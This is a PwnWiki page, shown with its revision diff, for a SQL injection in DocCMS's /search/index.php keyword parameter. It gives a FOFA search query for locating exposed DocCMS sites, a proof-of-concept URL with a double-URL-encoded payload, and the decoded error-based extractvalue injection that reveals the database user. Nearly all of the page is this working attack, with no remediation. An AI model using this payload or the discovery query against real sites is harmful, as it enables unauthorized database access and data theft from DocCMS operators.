Difference between revisions of "DocCMS keyword SQL注入漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> DocCMS ==FOFA== <pre> app="Doccms" </pre> ==POC== <pre> /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
DocCMS | DocCMS | ||
| Line 17: | Line 17: | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
其中payload為下列語句的二次Url編碼 | 其中payload為下列語句的二次Url編碼 | ||
</translate> | </translate> | ||
Latest revision as of 14:37, 8 July 2021
漏洞影響
DocCMS
FOFA
app="Doccms"
POC
/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33
其中payload為下列語句的二次Url編碼
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
